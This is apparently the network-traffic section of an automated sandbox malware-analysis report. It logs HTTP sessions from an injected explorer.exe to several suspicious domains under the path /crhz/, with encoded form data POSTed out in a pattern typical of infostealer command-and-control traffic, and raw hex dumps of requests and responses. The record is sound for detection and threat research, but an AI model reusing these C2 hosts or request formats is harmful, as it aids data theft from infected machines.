6e 6e 63 45 65 52 64 4b 59 4d 76 4f 38 7a 4e 46 77 28 72 30 69 4b 2d 75 43 35 47 36 30 74 43 77 6e 53 47 63 6c 63 36 64 4e 31 71 36 46 37 34 55 77 33 32 61 62 59 43 4e 4d 47 4b 70 68 67 36 78 59 70 6e 65 37 35 66 78 4f 45 5f 50 5a 45 45 4c 4f 62 71 75 32 38 6f 78 61 56 5a 54 4e 6d 50 50 4e 45 55 77 31 33 54 7a 77 73 7a 59 6e 54 38 67 7a 76 6a 76 75 6b 75 68 76 63 72 37 4c 39 79 7a 71 49 69 35 78 78 47 73 47 37 50 58 34 52 4e 69 6d 57 42 34 63 58 64 42 75 6e 4c 44 2d 7a 63 48 61 74 44 41 59 66 52 74 52 30 31 53 32 30 47 52 5a 35 65 43 38 50 4c 56 49 4a 70 4c 62 66 44 6c 4c 4a 55 4f 51 69 78 36 6b 51 46 49 70 77 62 59 34 28 37 33 58 30 5f 77 64 58 66 4c 30 63 51 73 31 57 70 41 32 4f 74 55 51 7a 38 4b 74 5a 41 4e 46 6a 45 49 57 69 54 63 56 36 72 68 78 45 69 4c 34 55 45 65 68 67 64 39 42 79 72 41 45 41 31 70 6d 7a 46 7a 76 46 4d 52 72 52 37 67 6e 4f 47 47 39 51 77 4e 55 6b 71 31 58 28 63 68 73 28 4f 78 70 30 70 36 4b 62 71 43 77 71 77 67 32 4f 6c 50 54 58 6a 68 6b 33 38 79 4e 69 43 39 76 39 45 28 52 47 74 72 34 38 53 5a 36 79 74 41 34 6e 77 44 64 66 51 77 50 68 70 62 68 58 68 77 36 55 77
                                                    Data Ascii: vG=qoO5CdCa5IsO2U~dILVmPjNoyL7vOnQjOqaTzp8dHS(wU5WL7AvDPJEvQqS3kwIDutLDatEB~WhyP83DMu9OKZenxrn1mdP2P9HdwB856IOsp3uSziOxiviozeX_2AvP05daz-dMfwZYOdl74mqUqZ1Y0RFvrrl7uU0n2HUTt99hjp(6DXs-mCKUHqqEwUl5sjs_4HHKB5FQwq6v0WUKAiXtOoDtljcOWQtwq7ZxeOIziePTdrl4OUta~ijavGQehiXz0UQX5krdc5m-rR0qD1K6~7Y7c-R2Qg2FrOwXfEEz0cO-R8D-bnpCqjNOXCggGRAuaLrNJ17vTO9xn-GeDCDcbVl41glNuCKiZoHTayr50ANBRrVQB-WcJPu7VOvF2RpCynVeWrJ7mjOpNG5k9xJ2N_L6MNN9n9a8XK8C6enQ1N6pcSYYcZ5gD9wu4ugKMH~Yk5pOaUiCuwjwQFXb~FuwA9zIGOf0KUoLZYlnf_GIDuln2jWS9RB3KlYKfpu1dXC7O2yo6gFgZNxNwHNrK8MRGtKrg313~ePjrPT2qRUEynum4jatLnGGTJvYG8FLRm4ikkIGcwfymd2_qEZ9w6Q1HfwWdXa1OOlbHl8nvWUw1gSoCc5Ad37Lolt3tOyTSi4pVJcMhyE239b7dl~keAaOuZ80zyVSk6CWknlyvltS7hfHqbDx3wDatSJT1rnQigY2Vgtyw92EWMPuyKXpRimvEYHoyfd7fwNaf9hVkeQmY4jAbG4Eh02Yp3SUg3LsaQ5bJnPVJZyn~7Gj3CHFqta-fk3-gRj4QVz6a9NJI7no8N1ysrzwa-W9csww~0ZSl4772KRddX~SYJmMUO7e~6ii6VKaRQYHRtTCd78w6SId6L6o0IEfsWHFMmSy2InSYN6bgdU7~9iAk6zGZK~fnL2EbNnWlBqJyEePeAS0D6HH6ZkWbnECSpCgkmOYxzXhdDtD5_XcD7UZcqguHX0MGVQalyUqSEuP5nncEeRdKYMvO8zNFw(r0iK-uC5G60tCwnSGclc6dN1q6F74Uw32abYCNMGKphg6xYpne75fxOE_PZEELObqu28oxaVZTNmPPNEUw13TzwszYnT8gzvjvukuhvcr7L9yzqIi5xxGsG7PX4RNimWB4cXdBunLD-zcHatDAYfRtR01S20GRZ5eC8PLVIJpLbfDlLJUOQix6kQFIpwbY4(73X0_wdXfL0cQs1WpA2OtUQz8KtZANFjEIWiTcV6rhxEiL4UEehgd9ByrAEA1pmzFzvFMRrR7gnOGG9QwNUkq1X(chs(Oxp0p6KbqCwqwg2OlPTXjhk38yNiC9v9E(RGtr48SZ6ytA4nwDdfQwPhpbhXhw6Uwo4EiUYBJuzihGccVkVX6LfQD94HAKxnSh6klmaPZhFe1H_JwCNGkiB~hRir-HZepv-13QxUiSZLfy-gUObae1qo.
                                                    Jan 30, 2023 13:41:28.653239965 CET856INHTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:41:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    22192.168.2.649744163.44.198.5080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:31.198645115 CET856OUTGET /crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.mitsubangsaen.online
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:31.408519030 CET857INHTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:41:31 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    23192.168.2.649745208.91.197.2780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:36.735569954 CET858OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.hayuterce.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.hayuterce.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.hayuterce.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 6e 53 32 78 42 69 69 4a 34 50 6d 4b 28 4e 72 4d 75 52 74 2d 78 6a 4a 50 42 33 39 7a 6e 53 4f 43 56 75 55 2d 43 72 73 37 59 65 43 78 38 2d 70 43 30 4f 57 64 4e 38 76 70 5a 63 59 57 55 71 5a 5a 77 47 5a 6f 47 35 4b 6a 4c 64 71 67 6e 77 36 43 59 66 51 39 7a 43 39 57 6e 4d 7a 4d 35 4e 4a 70 34 76 72 30 55 34 5a 4b 37 57 37 5a 4d 70 46 76 6d 56 46 56 51 73 4c 66 6b 6a 57 7a 28 36 6b 6d 48 4c 54 4a 4f 57 6d 37 75 39 71 56 72 33 65 6c 6f 56 4d 62 7a 54 4a 71 54 77 42 55 73 38 46 7a 68 78 68 44 70 74 7a 61 71 30 4b 75 72 30 68 68 74 38 53 34 38 33 51 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=nS2xBiiJ4PmK(NrMuRt-xjJPB39znSOCVuU-Crs7YeCx8-pC0OWdN8vpZcYWUqZZwGZoG5KjLdqgnw6CYfQ9zC9WnMzM5NJp4vr0U4ZK7W7ZMpFvmVFVQsLfkjWz(6kmHLTJOWm7u9qVr3eloVMbzTJqTwBUs8FzhxhDptzaq0Kur0hht8S483Q.


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    24192.168.2.649746208.91.197.2780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:39.401545048 CET860OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.hayuterce.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.hayuterce.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.hayuterce.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 6e 53 32 78 42 69 69 4a 34 50 6d 4b 74 39 37 4d 73 77 74 2d 67 54 4a 4d 4f 58 39 7a 74 79 4f 5a 56 75 49 2d 43 71 6f 72 59 4d 4f 78 28 74 52 43 30 74 75 64 4c 38 76 70 66 63 59 53 5a 4b 5a 44 77 47 4d 54 47 38 6d 4a 4c 62 79 67 6b 54 43 43 65 64 49 2d 34 53 39 75 73 73 7a 44 35 4e 49 7a 34 75 62 77 55 34 64 73 37 56 4c 5a 4e 62 39 76 67 6c 46 53 4a 63 4c 66 6b 6a 57 76 28 36 6b 47 48 4c 72 52 4f 58 7e 72 75 50 69 56 72 53 53 6c 75 32 30 59 6d 44 4a 75 50 67 41 46 6c 39 77 66 6d 44 38 50 70 64 62 56 39 42 36 47 32 6e 46 78 78 70 4c 34 6d 79 75 61 45 70 61 70 42 57 7a 42 42 44 6e 69 49 73 77 79 44 30 56 63 73 4b 63 48 4a 55 41 5f 34 4a 54 76 31 31 76 44 31 54 28 6c 73 4e 66 6a 7e 52 4c 66 4c 41 73 44 54 52 52 48 31 51 31 51 58 46 54 55 30 48 4a 73 57 77 6a 5a 6b 41 34 7a 53 32 48 64 55 4e 30 44 51 50 69 4e 78 41 41 71 47 78 78 71 46 6f 78 68 46 31 76 51 6b 5f 59 46 71 6d 70 69 39 37 71 5a 72 44 78 57 7e 44 35 53 6a 68 75 48 54 31 71 39 35 36 36 4e 41 69 67 63 73 69 46 4f 47 45 32 4f 44 35 32 4a 53 45 6c 6d 79 61 51 6a 7e 72 32 62 41 59 79 5f 7e 37 66 69 53 47 69 78 53 41 51 65 74 36 79 7a 6a 6a 32 63 57 48 63 54 54 68 77 41 64 6c 7e 4d 77 7a 39 38 4f 6c 72 43 73 2d 4f 4a 54 4c 6c 43 69 6f 6f 59 41 64 6b 57 52 65 44 39 58 74 32 77 38 36 73 46 7a 62 43 48 4a 55 79 77 41 59 47 34 34 77 52 44 58 4e 67 36 7a 43 70 65 74 62 79 72 54 38 33 30 78 2d 5a 4c 42 57 57 51 4a 77 55 6f 64 64 51 44 43 74 4d 39 46 68 45 59 47 32 71 65 38 32 7a 42 30 34 42 78 55 6e 63 2d 77 48 69 53 73 62 7a 55 41 6e 36 36 36 43 50 43 57 62 50 44 7a 76 53 44 62 65 61 57 6d 4b 31 33 76 58 45 64 62 64 48 39 51 46 53 72 43 59 48 69 43 38 6d 64 61 41 62 79 75 6e 61 75 62 6d 76 6e 74 35 28 59 72 4b 70 34 5a 4e 70 59 6b 4d 4a 55 70 74 74 4d 6d 31 4b 73 48 44 45 61 63 43 65 50 61 61 46 65 41 58 39 4b 51 32 6c 38 74 52 4d 42 56 56 64 61 52 74 78 58 75 68 52 48 48 59 52 52 43 66 35 65 42 77 41 2d 4d 34 46 72 6b 48 4a 75 47 56 72 62 50 66 63 2d 49 50 59 5a 4e 57 6b 5f 59 57 30 52 38 6c 5a 49 48 41 34 68 31 41 6b 74 57 53 4b 4f 33 30 55 33 77 61 4f 73 75 68 72 4a 56 78 6f 43 47 4d 6c 7a 5a 4e 50 69 66 57 6a 47 65 45 76 51 76 66 6f 68 6d 45 76 5f 73 75 49 6b 4a 4a 45 52 6a 6a 35 56 78 79 5a 61 65 4e 55 69 4b 57 45 72 31 51 50 74 76 38 53 4d 4b 43 4a 42 47 32 49 42 54 6d 7a 53 76 72 42 39 69 4d 63 6e 67 6e 4a 31 70 66 43 42 4f 36 6f 37 65 61 73 4f 78 51 55 50 45 55 5a 75 57 4f 66 5a 62 52 58 4a 63 4c 59 50 78 79 78 5a 75 56 44 35 35 6e 48 66 75 35 57 6a 6b 5a 33 7a 37 50 50 64 67 79 50 50 6e 76 57 5a 56 54 68 33 4e 31 54 69 62 52 39 58 65 67 38 64 67 76 61 78 73 31 44 48 68 54 35 45 34 47 4d 37 74 38 73 56 37 69 4f 79 4a 70 6d 66 42 58 46 65 28 44 42 6d 74 5a 75 41 48 45 36 66 41 46 49 4c 5a 32 4f 5a 62 54 78 58 53 74 45 2d 4a 54 67 63 57 56 77 36 47 71 6b 4b 6d 55 59 77 63 4d 50 66 64 5a 39 32 32 37 53 4b 4c 4c 69 57 57 4a 70 6b 66 76 37 63 35 42 55 72 55 35 61 32 4c 52 62 50 69 36 47 6d 71 56 6a 52 61 6b 44 6c 69 50 65 4c 79 53 65 54 61 46 38 37 6a 55 6b 45 44 30 53 6e 33 4c 43 70 67 46 61 52 7a 6a 4d 5f 57 39 64 55 66 77 4f 54 4c 5a 6e 47 32 64 41 53 7e 4a 71 51 48 30 55 38 63 35 4b 35 62 5a 4e 33 4b 39 66 71 37 57 47 36 38 73 37 43 55 71 54 39 49 67 54 56 42 44 7a 33 32 4c 31 64 49 53 43 67 35 61 66 56 57 55 73 44 66 4c 4b 56 7a 47 51 43 33 41 4d 4b 46 39 73 51 31 5f 59 33 45 70 79 65 64 4c 71 69 43 77 59 63 66 6b 79 6e 46 7a 47 53 7e 5a 74 51 34 34 71 62 4d 4e 72 5f 77 37 57 6e 79 5a 63 7a 49 5f 32 44 50 6c 55 41 36 4d 30 44 48 66 74 50 77 4d 4e 51 58 67 30 41 42 44 67 66 74 5f 59 76 43 6f 38 64 49 5a 30 6b 70 69 45 70 65 46 45 79 54 4e 7a 63 4a 39 41 68 79 62 4d 4a 62 6c 57 66 75 66 41 6f 7e 63 48 6f 74 64 44 50 49 64 4f 41 63 67 41 71 50 58 48 74 6d 7a 42 49 72 72 52 41 42 57 43 4d 37 44 6c 72 30 51 36 48 28 38 57 78 76 68 6f 71 33 37 6a 54 51 67 41 46 73 56 6e 6e 32 30 71 77 65 35 6d 37 4c 74 51 55 47 63 28 54 6e 48 35 39 30 74 44 35 32 4d 68 46 79 42 59 79 34 37 78 6d 68 6c 4d 48 47 2d 6e 37 61 57 6a 5a 4a 58 59 37 77 74 4f 74 30 52 35 62 47 64 32 71 78 75 65 38 54 4f 37 62 52 33 4f 38 4f 53 41 62 50 72 73 47 79 52 64 39 4a 62 76 4c 35 74 6e 69
                                                    Data Ascii: vG=nS2xBiiJ4PmKt97Mswt-gTJMOX9ztyOZVuI-CqorYMOx(tRC0tudL8vpfcYSZKZDwGMTG8mJLbygkTCCedI-4S9usszD5NIz4ubwU4ds7VLZNb9vglFSJcLfkjWv(6kGHLrROX~ruPiVrSSlu20YmDJuPgAFl9wfmD8PpdbV9B6G2nFxxpL4myuaEpapBWzBBDniIswyD0VcsKcHJUA_4JTv11vD1T(lsNfj~RLfLAsDTRRH1Q1QXFTU0HJsWwjZkA4zS2HdUN0DQPiNxAAqGxxqFoxhF1vQk_YFqmpi97qZrDxW~D5SjhuHT1q9566NAigcsiFOGE2OD52JSElmyaQj~r2bAYy_~7fiSGixSAQet6yzjj2cWHcTThwAdl~Mwz98OlrCs-OJTLlCiooYAdkWReD9Xt2w86sFzbCHJUywAYG44wRDXNg6zCpetbyrT830x-ZLBWWQJwUoddQDCtM9FhEYG2qe82zB04BxUnc-wHiSsbzUAn666CPCWbPDzvSDbeaWmK13vXEdbdH9QFSrCYHiC8mdaAbyunaubmvnt5(YrKp4ZNpYkMJUpttMm1KsHDEacCePaaFeAX9KQ2l8tRMBVVdaRtxXuhRHHYRRCf5eBwA-M4FrkHJuGVrbPfc-IPYZNWk_YW0R8lZIHA4h1AktWSKO30U3waOsuhrJVxoCGMlzZNPifWjGeEvQvfohmEv_suIkJJERjj5VxyZaeNUiKWEr1QPtv8SMKCJBG2IBTmzSvrB9iMcngnJ1pfCBO6o7easOxQUPEUZuWOfZbRXJcLYPxyxZuVD55nHfu5WjkZ3z7PPdgyPPnvWZVTh3N1TibR9Xeg8dgvaxs1DHhT5E4GM7t8sV7iOyJpmfBXFe(DBmtZuAHE6fAFILZ2OZbTxXStE-JTgcWVw6GqkKmUYwcMPfdZ9227SKLLiWWJpkfv7c5BUrU5a2LRbPi6GmqVjRakDliPeLySeTaF87jUkED0Sn3LCpgFaRzjM_W9dUfwOTLZnG2dAS~JqQH0U8c5K5bZN3K9fq7WG68s7CUqT9IgTVBDz32L1dISCg5afVWUsDfLKVzGQC3AMKF9sQ1_Y3EpyedLqiCwYcfkynFzGS~ZtQ44qbMNr_w7WnyZczI_2DPlUA6M0DHftPwMNQXg0ABDgft_YvCo8dIZ0kpiEpeFEyTNzcJ9AhybMJblWfufAo~cHotdDPIdOAcgAqPXHtmzBIrrRABWCM7Dlr0Q6H(8Wxvhoq37jTQgAFsVnn20qwe5m7LtQUGc(TnH590tD52MhFyBYy47xmhlMHG-n7aWjZJXY7wtOt0R5bGd2qxue8TO7bR3O8OSAbPrsGyRd9JbvL5tnixXLltZqruw4OQu476C7dFufLq98FjgT9Ds1VLL3HDdRCkRCvE4vKQFZ-HbduTC11sRkoF_wBFx8-PwyJTcbP1MY.


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    25192.168.2.649747208.91.197.2780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:42.073522091 CET860OUTGET /crhz/?vG=qQeRCSv6osLquMzUsT5auAtcL2kpuT7TXoM3AMsXZ7zh5sUe46PrJPqpdbUyVeYEw0ooLJaeJdeynj+iQ6oazAlglr/WxPNHjeDwf7x3jgqV&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.hayuterce.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:43.019862890 CET862INHTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:41:42 GMT
                                                    Server: Apache
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                    Set-Cookie: vsid=919vr4226281028006487; expires=Sat, 29-Jan-2028 12:41:42 GMT; Max-Age=157680000; path=/; domain=www.hayuterce.com; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_W29ddwAys37fYW0hCdc1qer1ZBrVJkMdG95wpV08/PVlpHvKC7LRA5VvQcsQpj8m2QunFMhYGUqugG7HZYix/w==
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Connection: close
                                                    Jan 30, 2023 13:41:43.019927025 CET862INData Raw: 34 62 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c
                                                    Data Ascii: 4b54<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript"
                                                    Jan 30, 2023 13:41:43.019973993 CET863INData Raw: 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 61 79 75 74 65 72 63 65 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20
                                                    Data Ascii: src="http://www.hayuterce.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.hayuterce.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElem
                                                    Jan 30, 2023 13:41:43.020020962 CET864INData Raw: 61 72 2e 65 6f 74 22 29 3b 73 72 63 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74
                                                    Data Ascii: ar.eot");src: url("http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix") format("embedded-opentype"),url("http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff") format("woff"),
                                                    Jan 30, 2023 13:41:43.020066977 CET866INData Raw: 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 62 6f 6c 64 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 62 6f 6c 64 2e 74 74 66 22 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22
                                                    Data Ascii: -image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf") format("truetype"),url("http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf") format("opentype"),url("http://i4.cdn-image.com/__media__/fonts/montserrat-b
                                                    Jan 30, 2023 13:41:43.020118952 CET867INData Raw: 61 72 63 68 65 73 20 75 6c 2e 6c 61 73 74 2c 20 2e 72 65 6c 61 74 65 64 2d 73 65 61 72 63 68 65 73 20 75 6c 2e 6c 61 73 74 7b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 75 6c 2e
                                                    Data Ascii: arches ul.last, .related-searches ul.last{ border-bottom:0}.popular-searches ul.first li{-webkit-text-size-adjust: 100%;color: #ffffff;text-align: left;word-wrap: break-word;border-radius: 15px; border: solid 4px #979797; margin-bottom: 10px
                                                    Jan 30, 2023 13:41:43.020168066 CET868INData Raw: 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 23 33 33 33 7d 0d 0a 0d 0a 2f 2a 64 69 76 2e 73 65 61 72 63 68 2d 66 6f 72 6d 7b 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67
                                                    Data Ascii: ver {text-decoration:underline; color:#333}/*div.search-form{height:50px; margin:0 auto;border-bottom: 3px solid #fff}.srchTxt{background: transparent; border: 0px none; float: left; font-size: 16px; height: 28px; line-height: 28px; padd
                                                    Jan 30, 2023 13:41:43.020215034 CET869INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 20 77 69 64 74 68 3a 20 31 30 30 25 7d 0d 0a 2e 70 72 69 76 61 63 79 20 61 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f
                                                    Data Ascii: padding-bottom: 10px; width: 100%}.privacy a{color:#333333;text-align: center;font-size: 11px}.privacy a:hover{text-decoration: underline}.footlinks-custom-link{background: none !important;}.footlinks-custom-link a{color: #4d5673 !im
                                                    Jan 30, 2023 13:41:43.020267963 CET871INData Raw: 74 3a 20 32 38 70 78 7d 0d 0a 20 20 20 20 2e 73 72 63 68 54 78 74 7b 68 65 69 67 68 74 3a 20 31 38 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 7d 0d 0a 20 20 20 20 2e 73 72 63 68 42 74 6e 7b 77 69 64 74 68 3a 20 31 38 70 78 3b 20 68 65
                                                    Data Ascii: t: 28px} .srchTxt{height: 18px;font-size: 14px} .srchBtn{width: 18px; height: 18px; background-size: 100%}*/}.content-container{background: none !important}.main-container{border:none !important;height: auto !important}.hea
                                                    Jan 30, 2023 13:41:43.020315886 CET872INData Raw: 3b 7d 20 0d 0a 2e 6d 73 67 6c 65 66 74 20 61 7b 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 0a 20 20
                                                    Data Ascii: ;} .msgleft a{word-wrap: break-word;font-size: 30px;color: #fff;font-family: montserrat-bold ,Arial, sans-serif; font-weight: bold; display: inline-block}.msgright{float: right;font-size: 14px;text-align: right; width: 50%}.msgright
                                                    Jan 30, 2023 13:41:43.020363092 CET873INData Raw: 6c 6f 72 3a 20 23 34 64 35 36 37 33 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 32 35 30 70 78 29 7b 0d 0a 2e 66 6f 6f 74 65 72 77 72 61
                                                    Data Ascii: lor: #4d5673!important;}@media only screen and (max-width:1250px){.footerwrap{width:95%}}@media only screen and (max-width:990px) {.msgleft{width: 33%;padding-top: 10px; padding-bottom: 10px; width: 100%;margin-bottom: 10px;text-


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    26192.168.2.649748156.227.6.3080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:41:48.491260052 CET883OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.wylvxing.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.wylvxing.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.wylvxing.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 65 7a 56 65 7e 4d 4f 4e 61 4c 78 77 4f 47 69 46 4f 65 4f 52 34 71 6e 43 28 58 35 72 49 74 4c 51 57 38 62 6c 48 5a 52 47 46 5a 56 6c 65 33 74 35 6b 34 52 52 7e 6c 61 4d 4e 78 45 69 6e 49 78 42 4c 34 5a 30 7a 6e 47 45 55 5a 37 6c 28 6f 56 6e 58 75 56 2d 48 4b 4a 4e 67 62 73 53 6a 35 36 30 7e 2d 4f 70 72 44 64 58 44 6d 62 5a 44 58 68 73 4f 55 73 69 74 55 56 42 4f 50 6c 59 74 7a 61 43 6c 37 34 59 28 44 50 6c 79 4a 68 79 52 79 5a 55 55 62 34 32 62 6e 67 70 43 4b 53 4b 55 62 52 38 66 31 47 41 50 45 62 78 4c 4c 74 71 72 4b 6b 34 6e 74 73 63 49 7a 55 2e 00 00 00 00 00 00 00 00
